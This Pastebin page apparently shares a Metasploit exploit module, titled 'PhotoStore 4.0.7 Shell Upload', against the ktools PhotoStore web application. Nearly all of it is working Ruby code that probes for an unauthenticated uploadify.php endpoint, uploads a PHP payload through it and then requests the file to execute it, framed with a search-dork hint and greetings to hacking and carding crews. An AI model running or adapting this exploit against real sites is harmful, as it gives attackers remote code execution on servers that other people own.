Advertisement
AndrewHaxalot

PhotoStore 4.0.7 Shell Upload

Dec 29th, 2013
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.53 KB | None | 0 0
  1. ###################################################################################​##################
  2. # __________.__ _________ _________
  3. # \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
  4. # | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
  5. # | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
  6. # |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
  7. # \/ \/ \/ \/ \/ \/
  8. #
  9. #
  10. #http://tcc.sch.id
  11. ###################################################################################​##################
  12. # Exploit title : PhotoStore 4.0.7 shell upload
  13. # Author : Gabby
  14. # Dork : use ur brain ;)
  15. # Vendor Site : http://www.ktools.net
  16. # Software : http://www.ktools.net/photostore/
  17. ###################################################################################​##################
  18.  
  19.  
  20. ##
  21. # This module requires Metasploit: http//metasploit.com/download
  22. # Current source: https://github.com/rapid7/metasploit-framework
  23. ##
  24.  
  25.  
  26. require 'msf/core'
  27.  
  28. class Metasploit3 < Msf::Exploit::Remote
  29. Rank = ExcellentRanking
  30.  
  31. include Msf::Exploit::Remote::HttpClient
  32. include Msf::Exploit::PhpEXE
  33.  
  34. def initialize(info = {})
  35. super(update_info(info,
  36. 'Name' => 'photostore',
  37. 'Description' => %q{
  38. This module exploits a vulnerability found in photostore. By abusing the uploadify.php file, a malicious user can upload a file to a
  39. temp directory without authentication, which results in arbitrary code execution.
  40. },
  41. 'Author' =>
  42. [
  43. 'Gabby' # metasploit module
  44. ],
  45. 'License' => MSF_LICENSE,
  46. 'References' =>
  47. [
  48. [ 'URL', 'http://metasploit.com' ]
  49. ],
  50. 'Payload' =>
  51. {
  52. 'BadChars' => "\x00",
  53. },
  54. 'Platform' => 'php',
  55. 'Arch' => ARCH_PHP,
  56. 'Targets' =>
  57. [
  58. [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
  59. [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
  60. ],
  61. 'DefaultTarget' => 0,
  62. 'DisclosureDate' => 'dec 2013'))
  63.  
  64. register_options(
  65. [
  66. OptString.new('TARGETURI', [true, 'The full URI path to photostore', '/photostore'])
  67. ], self.class)
  68. end
  69.  
  70. def check
  71. uri = target_uri.path
  72. uri << '/' if uri[-1,1] != '/'
  73.  
  74. res = send_request_cgi({
  75. 'method' => 'GET',
  76. 'uri' => "#{uri}assets/uploadify/uploadify.php"
  77. })
  78.  
  79. if not res or res.code != 200
  80. return Exploit::CheckCode::Unknown
  81. end
  82.  
  83. return Exploit::CheckCode::Appears
  84. end
  85.  
  86. def exploit
  87. uri = target_uri.path
  88. uri << '/' if uri[-1,1] != '/'
  89.  
  90. peer = "#{rhost}:#{rport}"
  91.  
  92. @payload_name = "#{rand_text_alpha(5)}.php"
  93. php_payload = get_write_exec_payload(:unlink_self=>true)
  94.  
  95. data = Rex::MIME::Message.new
  96. data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
  97. data.add_part("#{uri}assets/uploadify/", nil, nil, "form-data; name=\"folder\"")
  98. post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
  99.  
  100. print_status("#{peer} - Uploading payload #{@payload_name}")
  101. res = send_request_cgi({
  102. 'method' => 'POST',
  103. 'uri' => "#{uri}assets/uploadify/uploadify.php",
  104. 'ctype' => "multipart/form-data; boundary=#{data.bound}",
  105. 'data' => post_data
  106. })
  107.  
  108. if not res or res.code != 200 or res.body !~ /#{@payload_name}/
  109. fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
  110. end
  111.  
  112. upload_uri = res.body
  113.  
  114. print_status("#{peer} - Executing payload #{@payload_name}")
  115. res = send_request_raw({
  116. 'uri' => upload_uri,
  117. 'method' => 'GET'
  118. })
  119. end
  120. end
  121.  
  122.  
  123. ###################################################################################​##################
  124. Thanks to :
  125. Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, N035,
  126. my sista Wii, cW3 G4pt3K, Red-x, Vanda, Deb + Sultan, Meninbox, ./Dzawa, Th3.Black.D3Vils n all my luvly friend,..
  127.  
  128. Greets to :
  129. Yogyacarderlink, SurabayaBlackhat & Madleets Team... ^^
  130. ###################################################################################​##################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement